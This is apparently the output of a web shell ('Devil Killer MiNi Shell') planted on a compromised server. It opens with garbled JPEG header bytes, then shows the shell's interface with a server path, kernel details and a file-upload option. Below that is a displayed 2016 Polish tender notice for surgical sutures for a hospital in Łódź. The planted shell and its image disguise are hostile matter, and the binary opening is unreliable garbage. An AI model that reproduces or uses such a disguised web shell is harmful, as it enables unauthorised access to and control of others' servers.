JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160405/76716-N-2016.html

<p class="kh_header"><b>Łódź: 60/ZP/16 Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 30 000 euro, nie przekraczającej 209 000 euro na dostawy materiałów szewnych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</b><br>
<b>Numer ogłoszenia: 76716 - 2016; data zamieszczenia: 05.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 60/ZP/16 Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 30 000 euro, nie przekraczającej 209 000 euro na dostawy materiałów szewnych dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa materiałów szewnych wyszczególnionych ilościowo  i asortymentowo w załączniku nr 1a do SIWZ. 

Przedmiot zamówienia został podzielony na 17 pakietów.

Pakiet nr 1	(obejmujący 5 pozycji) - Monofilament syntetyczny, wchłanialny, barwiony, podtrzymujący tkanki min. 10 tygodni, wchłaniający się w okresie 170-210 dni	
Pakiet 2 (obejmujący 6 pozycji) - Podwiązka syntetyczna na bazie kwasu mlekowego i glikolowego, pleciona, powlekana, barwiona, o podtrzymywaniu tkankowym min 75%  po 14 dniach po zaimplantowaniu, wchłaniająca się w okresie 56-70 dni
Pakiet 3 (obejmujący 33 pozycje) - Szew syntetyczny na bazie kwasu mlekowego i glikolowego , pleciony, powlekany, barwiony, o podtrzymywaniu tkankowym min.75% po 14 dniach po zaimplantowaniu  w okresie 56-70 dni								
Pakiet 4 (obejmujący 2 pozycje) - Szew syntetyczny ,pleciony, powlekany o podtrzymywaniu tkankowym 50% po 5 dniach, 0% po 14 dniach od zaimplantowania, wchłaniający się około 42 dni	
Pakiet 5 (obejmujący 2 pozycje) - Szew syntetyczny, wchłanialny, monofilament jednowłóknowy, niepowlekany barwiony podtrzymywanie tkankowe po 14 dniach 100%, po ok 90 dniach -50%, wchłaniający się ok. 13 miesięcy.  
Pakiet 6 (obejmujący 4 pozycje) - Szew syntetyczny, jednowłóknowy, bezbarwny , wchłaniający się do 56 dni
Pakiet 7 (obejmujący 30 pozycji) - Szew syntetyczny , jednowłóknowy , o  podtrzymywaniu tkankowym 50% , po 13-14 dniach od zaimplantowania , wchłaniający 60-90 dni		
Pakiet 8 (obejmujący 6 pozycji) - Szew syntetyczny, na bazie glikolidu jednowłóknowy, o  podtrzymywaniu tkankowym 4-5 tygodni , wchłaniający się od 90-110 dni od  zaimplantowania
Pakiet 9 (obejmujący 13 pozycji) - Szew syntetyczny niewchłanialny wykonany z polipropylenu, naczyniowy, barwiony.	
Pakiet 10 (obejmujący 15 pozycji) - Szew niewchłanialny, jednowłóknowy, barwiony, poliamidowy	
Pakiet 11 (obejmujący 4 pozycje) - Szew niewchłanialny, pleciony, poliestrowy, powlekany	
Pakiet 12 (obejmujący 2 pozycje) -  Szew niewchłanialny, pleciony, syntetyczny, poliamidowy
Pakiet 13  (obejmujący 20 pozycji) - Szew  niewchłanialny, pleciony, jedwabny
Pakiet 14 (obejmujący 8 pozycji) - Szew niewchłanialny, lniany, powlekany	
Pakiet 15 (obejmujący 2 pozycje)	
1. Szew ewentracyjny, stalowy, skręcony, powlekany o grubości 1,3 mm, długość 90 cm, zakończony dwiema igłami tnącymi. Wielkość igły 100 mm, krzywizna igły 3/8 koła plus dwie płytki polietylenowe.
2. Syntetyczna, wchłanialna taśma chirurgiczna, czas wchłaniania do 90 dni, długość nitki 60 cm, krzywizna igły ? koła, igła okrągła tempa ok. 65 mm.
Pakiet 16 ( obejmujący 2 pozycje) Niewchłanialny monofilament ze stali nierdzewnej
Pakiet 17 ( obejmujący 1 pozycję) - Wosk - preparat hemostatyczny, naturalny, tamujący krwawienie z kości..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Informacja o dokumentach potwierdzających, że oferowane dostawy odpowiadają określonym wymaganiom należy przedłożyć:

a)	Oryginalne ulotki producenta, katalogi, opisy przedmiotu zamówienia, dokumentacja techniczna w języku polskim potwierdzające wymagane parametry zamawianego asortymentu (jeśli oryginalna dokumentacja jest w innym języku niż polski, to Wykonawca dostarczy wraz z oryginałem tłumaczenie na język polski). - dotyczy wszystkich pakietów

b)	Próbki dla potrzeb przeprowadzenia oceny asortymentu pod względem zgodności z SIWZ, w następujących ilościach :

Pakiet nr  1  (dla pozycji 2, 4) - 3 szt.
Pakiet nr 2  (dla pozycji 6) - 3 szt.
Pakiet nr 3  (dla pozycji 8, 11, 16, 21) - 4 szt.
Pakiet nr 4 (dla pozycji 1), pakietu nr 5 (dla pozycji 1, 2) - 2 szt.
Pakiet nr 5 (dla pozycji 1, 2) - 3 szt.
Pakiet nr 6 (dla pozycji 4) - 3 szt.
Pakiet nr 7 (dla pozycji 6, 9, 14 ) - 3 szt.
Pakiet nr  8 (dla pozycji 2, 5, 6) - 4 szt. 
Pakiet nr 9 (dla pozycji 4, 5, 8, 9, 11) - 4 szt.
Pakiet nr 10 (dla pozycji 2, 5, 8, 9, 14, 15) - 3 szt.
Pakiet  nr 11 (dla pozycji  1, 2, 4)  - 3 szt.
Pakiet nr 12 (dla pozycji 1), - 2 szt.
Pakiet nr 13 (dla pozycji 6, 9, 14, 15, 19, 20) - 4 szt.
Pakiet nr 14 (dla pozycji 1, 3) - 2 szt.
Pakiet nr  15 (dla pozycji 1, 2) -  3 szt.
Pakiet nr 16 (dla pozycji 1) - 2 szt. 
Pakiet  nr 17 (dla pozycji 1) - 3 szt.

Zamawiający  zastrzega, że nie  zwraca  dostarczonych  próbek. Próbki będą badane pod kątem zgodności zaoferowanego przedmiotu z SIWZ, a także pod kątem dokonania oceny funkcjonalno - użytkowej.

Niedostarczenie wymaganych próbek do dnia i godziny składania ofert lub dostarczenie ich w mniejszej ilości spowoduje odrzucenie oferty.
Okazanie próbek o cechach niezgodnych z opisem przedmiotu zamówienia spowoduje odrzucenie oferty.

2.	Zamawiający wymaga, aby wraz z ofertą dostarczone były następujące dokumenty spełniające wymogi dopuszczenia do obrotu i użytkowania zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. nr 107, poz. 679), tj.  

w zakresie wyrobów medycznych wprowadzonych do obrotu i używania do 17.09.2010r. włącznie oraz 
w zakresie wyrobów medycznych wprowadzonych do obrotu i używania po 17.09.2010r.
Deklarację Zgodności Producenta - dla sprzętu medycznego  dla  medycznych wszystkich klas; 
Certyfikat jednostki notyfikowanej biorącej udział przy ocenie zgodności wyrobu medycznego (Certyfikaty CE) - dla klasy wyrobu I sterylna, I z funkcją pomiarową, IIa, IIb, III;
dla wyrobów medycznych klasy IIa, IIb lub III - oświadczenie wytwórcy lub autoryzowanego przedstawiciela wystawionego po przeprowadzeniu odpowiedniej dla danego wyrobu procedury oceny zgodności i potwierdzającego, że wyrób spełnia odnoszące się do niego wymagania zasadnicze, lub wskazujące, które z wymagań zasadniczych nie zostały spełnione, z podaniem przyczyn;
w przypadku wyrobów medycznych wprowadzonych do obrotu i używania do 17.09.2010r. włącznie wniosek o przeniesienie danych do bazy danych gromadzonych przez Prezesa Urzędu na informatycznych nośnikach danych zgodnie z art. 64 ust. 1 ustawy o wyrobach medycznych z dnia 17.09.2010r. (Dz. U. z 2010r. nr 107 poz. 679)
w przypadku wytwórców i autoryzowanych przedstawicieli mających miejsce zamieszkania lub siedzibę na terytorium Rzeczypospolitej Polskiej - zgłoszenie wyrobu do Prezesa Urzędu (obowiązek złożenia kopii zgłoszenia do Prezesa Urzędu dotyczy wyłącznie wytwórców i autoryzowanych przedstawicieli, w przypadkach wskazanych w ustawie) lub, w przypadku dystrybutorów i importerów mających miejsce zamieszkania lub siedzibę na terytorium Rzeczypospolitej Polskiej, którzy wprowadzili na terytorium Rzeczypospolitej Polskiej wyrób przeznaczony do używania na tym terytorium - powiadomienie o tym wprowadzeniu Prezesa Urzędu (obowiązek złożenia kopii zgłoszenia do prezesa Urzędu dotyczy wyłącznie dystrybutorów i importerów, w przypadkach wskazanych w ustawie).

Dotyczy pakietu nr 1  (dla pozycji 2, 4), pakietu nr 2  (dla pozycji 6), pakietu nr 3  (dla pozycji 8, 11, 16, 21), pakietu nr 4 (dla pozycji 1), pakietu nr 5 (dla pozycji 1, 2), pakietu nr 6 (dla pozycji 4),  pakietu nr 7 (dla pozycji 6, 9, 14 ), pakietu nr  8 (dla pozycji 2, 5, 6), pakietu nr 9 (dla pozycji 4, 5, 8, 9, 11), pakietu nr 10 (dla pozycji 2, 5, 8, 9, 14, 15), pakietu nr 11 (dla pozycji  1, 2, 4) , pakietu nr 12 (dla pozycji 1), pakietu nr 13 (dla pozycji 6, 9, 14, 15, 19, 20), pakietu nr 14 (dla pozycji 1, 3), pakietu nr  15 (dla pozycji 1, 2), pakietu nr 16 (dla pozycji 1), pakietu nr 17 (dla pozycji 1).

Dla wszystkich pozostałych pozycji z pakietów  Zamawiający wymaga złożenia powyższych dokumentów spełniających wymogi dopuszczenia do obrotu i użytkowania zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. nr 107, poz. 679) wraz z pierwszą dostawą.

Oświadczenie zgodnie z art. 36a ust. 1 i art. 36b ust. 1 ustawy w zakresie wskazania części zamówienia, której wykonanie zamierza powierzyć podwykonawcom
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:

A.	Dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzających, że:

a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

b)	jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt. a, zastępuje się je dokumentem oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednia datą wymagana dla tych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający na podstawie art. 144 ust. 1 ustawy z dnia 29 stycznia 2004. prawo zamówień publicznych przewiduje możliwość dokonania zmiany w zawartej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących sytuacjach:
a)	wprowadzenia produktu zmodyfikowanego lub udoskonalonego spełniającego parametry wymagane w SIWZ, pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym. Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie aneksu w którym dotychczasowy produkt zostanie wykreślony i zastąpiony produktem zmodyfikowanym lub udoskonalonym.
b)	wycofania produktu z produkcji. Wykonawca ma obowiązek zapewnić dostarczenie produktu zamiennego o parametrach nie gorszych od produktu objętego umową pod warunkiem zachowania ceny jednostkowej netto na poziomie nie wyższym, niż produkt objęty zamówieniem początkowym. Ewentualna zmiana produktu może być dokonana na pisemny wniosek Wykonawcy, poprzez zawarcie  aneksu mocą którego nastąpi wykreślenie z umowy produktu wycofanego z produkcji i zastąpienie go produktem zamiennym.
c)	W przypadku zmiany stawki podatku VAT Zamawiający dopuszcza możliwość zmiany cen brutto towarów nabywanych na podstawie niniejszej umowy przy pozostawieniu cen netto bez zmian. Zmiana nie wymaga sporządzenia aneksu w formie pisemnej, ewentualnie strony mogą zawrzeć aneks porządkujący na wniosek którejkolwiek ze stron.
d)	zmiany ceny netto oferowanego asortymentu jeden raz w roku w odstępach co najmniej 12 miesięcy, w oparciu o średnioroczny wskaźnik wzrostu cen towarów i usług podawanych oficjalnie przez GUS na pisemny wniosek Wykonawcy przy czym pierwsza zmiana nastąpi nie wcześniej niż po upływie 12 miesięcy dnia podpisania umowy. Każdorazowa zmiana wymaga sporządzenia aneksu w formie pisemnej pod rygorem nieważności oraz udokumentowania przez Wykonawcę zmiany wskaźnika wraz ze wskazaniem źródła zmiany.
e)	zmiany polegającej na zamianie niewykorzystanego asortymentu obejmującego powyższą umowę  na asortyment już wykorzystany z tej umowy z zastrzeżeniem, iż całkowita wartość brutto umowy nie może ulec zmianie, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności.
f)	zmiany przedmiotowej/ produkt zamienny jeśli wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu  produktu zamiennego o parametrach nie gorszych od produktu objętego umową oraz przy zachowaniu ceny jednostkowej, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności.
g)	wydłużenia, na okres do kolejnych 6 miesięcy, okresu trwania umowy - w przypadku niewyczerpania całości asortymentu określonego w Załączniku nr 1 w terminie na jaki umowa została zawarta, 
h)	zakupu u Wykonawcy w miejsce wyrobu wskazanego w załączniku nr 1 do umowy odpowiednika tego samego lub  innego producenta po cenie nie wyższej niż cena zawarta w umowie za dany wyrób, w wypadku gdy będzie to uzasadnione potrzebami terapeutycznymi lub innymi potrzebami Zamawiającego;
i)	zmiany cen na korzyść Zamawiającego - w każdym przypadku; , zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności.
j)	Przesunięć ilościowo-asortymentowych pomiędzy poszczególnymi pakietami z zastrzeżeniem, że całkowita wartość brutto umowy nie może ulec zmianie, zmiana nastąpi w formie aneksu do umowy w formie pisemnej pod rygorem nieważności.
2.	Całkowita wartość umowy brutto w całym okresie obowiązywania umowy może ulec zwiększeniu jedynie w zakresie proporcjonalnym do ewentualnej podwyżki stawki podatku VAT, jeśli będzie miała w czasie obowiązywania umowy miejsce. Zamawiający może jednak postanowić, wedle swojego uznania, że pozostawia całkowitą wartość umowy brutto na dotychczasowym poziomie przy jednoczesnym odpowiednim skróceniu czasu obowiązywania umowy lub zmniejszeniu ilości nabywanych produktów leczniczych/towarów/wyrobów medycznych.
3.	W przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, bądź zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, Zamawiający dopuszcza podwyżkę cen jednostkowych asortymentu stanowiącego przedmiot zamówienia pod warunkiem, że Wykonawca w sposób nie budzący wątpliwości wykaże, że zmiany powyższe mają  wpływ na koszty wykonania zamówienia przez wykonawcę, wraz z dokładnym wyliczeniem wskazującym na uzasadniony zakres podwyżki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, Dział Zamówień Publicznych, ul. Pabianicka 62, 93-513 Łódź..</p>
